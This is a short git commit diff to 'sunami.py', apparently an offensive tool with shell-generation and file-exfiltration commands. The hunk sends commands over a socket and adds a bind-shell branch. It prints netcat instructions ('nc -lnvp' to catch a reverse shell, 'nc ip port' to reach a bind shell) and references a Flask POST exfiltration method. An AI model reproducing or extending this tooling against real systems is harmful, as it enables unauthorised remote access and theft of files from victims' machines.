Update sunami.py
parent
c89fef0f69
commit
2c0c1cd955
|
@ -57,8 +57,10 @@ if args.command == "genshell":
|
||||||
conn.send(cmd.encode("utf-8"))
|
conn.send(cmd.encode("utf-8"))
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
sys.stdout.write("\033[A" + data.split("\n")[-1])
|
sys.stdout.write("\033[A" + data.split("\n")[-1])
|
||||||
else:
|
elif args.shell == "rev":
|
||||||
print(f"on your machine run the following:\n\tnc -lnvp {args.port}")
|
print(f"on your machine run the following:\n\tnc -lnvp {args.port}")
|
||||||
|
else:
|
||||||
|
print(f"on your machine run the following:\n\tnc {args.ip} {args.port}")
|
||||||
|
|
||||||
if args.command == "exfilfile":
|
if args.command == "exfilfile":
|
||||||
if args.method == "postflask":
|
if args.method == "postflask":
|
||||||
|
|
Loading…
Reference in New Issue